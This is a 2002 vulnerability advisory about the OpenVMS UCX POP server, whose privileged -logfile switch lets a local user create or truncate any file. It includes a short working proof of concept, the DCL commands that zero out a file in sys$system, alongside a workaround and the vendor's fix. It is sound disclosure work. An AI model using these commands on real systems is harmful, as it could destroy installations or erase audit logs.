Akita Security Advisory 27/09/2002 OpenVMS UCX$POP_SERVER.EXE vulnerability Advisory: http://www.akita-security.co.uk/VMS/ucx_pop_server.txt VMS security tool http://www.akita-security.co.uk/stoat Overview ======== UCX is the main TCP/IP stack for OpenVMS. Akita Security have discovered a vulnerability in every version of the UCX pop server which allows a local user to overwrite any file on the system with a 0 byte file. Due to the popularity of UCX this problem will be widespread amongst OpenVMS installations. This issue was discovered as part of wider research into OpenVMS security. Many issues have been found, and further advisories will be released shortly. Detail ====== The UCX pop server binary, SYS$SYSTEM:UCX$POP_SERVER.EXE, is installed with the VMS privileges BYPASS and SYSPRV: INSTALL> list ucx$pop_server.exe /full DISK$OPENVMS071:<SYS0.SYSCOMMON.SYSEXE>.EXE UCX$POP_SERVER;1 Prv Entry access count = 1 Privileges = SYSPRV BYPASS INSTALL> The BYPASS privilege allows the pop server to override filesystem permissions. By use of the -logfile commandline switch, it is possible to persuade the server to open a file anywhere, or to truncate an existing file, as follows: ____________________________________________________________________ $ show process/privs 25-SEP-2002 10:47:35.02 User: MIKE Process ID: 0000013F Node: VAX Process name: "_TNA21:_1" Authorized privileges: NETMBX TMPMBX Process privileges: NETMBX may create network device TMPMBX may create temporary mailbox Process rights: INTERACTIVE REMOTE System rights: SYS$NODE_VAX $ $ break_it :== $sys$system:ucx$pop_server.exe $ break_it -logfile sys$system:I_SHOULDNT_BE_ABLE_TO_WRITE_HERE 19102-09-24 17:41:39 sizeof(block_wait_times) 160 19102-09-24 17:41:40 sizeof(struct vms_time_rec) 32 19102-09-24 17:41:40 num_elems 5 [SNIP] ^C $ dir/prot sys$system:I_* Directory SYS$SYSROOT:[SYSEXE] I_SHOULDNT_BE_ABLE_TO_WRITE_HERE.;1 insufficient privilege or object protection violation Total of 1 file. $ ____________________________________________________________________ The file created looks like this: ____________________________________________________________________ Directory SYS$SYSROOT:[SYSEXE] I_SHOULDNT_BE_ABLE_TO_WRITE_HERE.;1 File ID: (9499,485,0) Size: 0/0 Owner: [SYSTEM] Created: 24-SEP-2002 17:41:41.14 Revised: 24-SEP-2002 17:41:57.09 (1) Expires: <None specified> Backup: <No backup recorded> Effective: <None specified> Recording: <None specified> File organization: Sequential Shelved state: Online File attributes: Allocation: 0, Extend: 0, Global buffer count: 0 No version limit Record format: Stream_LF, maximum 0 bytes, longest 32767 bytes Record attributes: Carriage return carriage control RMS attributes: None Journaling enabled: None File protection: System:RWED, Owner:RWED, Group:RE, World: Access Cntrl List: None Total of 1 file, 0/0 blocks. $ ____________________________________________________________________ Severity ======== At the least, this bug could be used by a local user to destroy an OpenVMS installation, or overwrite logfiles. If a local user could control the log output of the pop server it could probably be used to gain full privileges, although this is speculation on our part. Workaround ========== Remove world execute permissions for the pop server binary. Vendor status ============= Akita Security informed Compaq of this vulnerability on 14/06/2002. Compaq have released an ECO which corrects the problem: ____________________________________________________________________ ECO B 1-JUL-2002 Alpha and VAX Problem: Disable the "-logfile" command line switch, which is not needed on OpenVMS. Deliverables: TCPIP$POP_SERVER.EXE V5.3-18B Reference: Internal testing. ____________________________________________________________________ Please note the lack of reference to a security problem, and the lack of credit to Akita Security. Internal testing ? Credit ====== This issue was discovered by mike@akita.co.uk -- Mike Riley - Security Systems manager @ Akita http://www.akita-security.co.uk -------------------------------------------------------------------- Sales: T:+44(0)1869 320111 F: +44(0)1869250688 E: sales@akita.co.uk Tech: T: +44(0)1869 320111 E: mike@akita.co.uk -------------------------------------------------------------------- "Security, performance, cost - pick two"
